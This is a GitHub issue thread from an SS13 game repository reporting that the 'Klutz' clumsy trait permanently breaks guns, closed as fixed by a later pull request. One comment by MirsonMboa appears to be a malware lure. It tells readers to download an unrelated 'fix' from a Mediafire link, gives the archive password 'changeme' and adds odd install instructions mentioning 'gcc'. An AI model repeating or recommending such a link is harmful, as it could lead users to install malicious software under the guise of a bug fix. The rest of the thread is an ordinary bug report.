### ISSUE TITLE
Klutz Completely Breaks Guns

### ISSUE THREAD

**Issue by EmilitiaEnnehrt** [Equinox-SS13/equinox-sojourn#66]
> Ported this issue directly from Sojourn's bugs-and-issues channel discord. Bug report is by my good friend `@mathiel` and is current.
Trilby additionally confirmed the bug for the gun.
---

## Klutz completely breaks guns.

Klutz is basically the "Clumsy" mutation-adding trait which makes a lot of things unusable or harder to with worse skillchecks. It prevents the use of things like guns, handcuffs, shields, swords, etc. Even bashing batons count.

Currently, the problem with this is that when a person with clumsy uses a gun, they "shoot yourself in your own foot", but afterwards it break the gun completely; the gun cannot be used by another person, reloading does not fix this issue. The message prompt appears for anyone who attempt to with "`gunname` is not ready to fire again" permanently.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Takykardi** [comment]
Fixed by #79, closing issue.
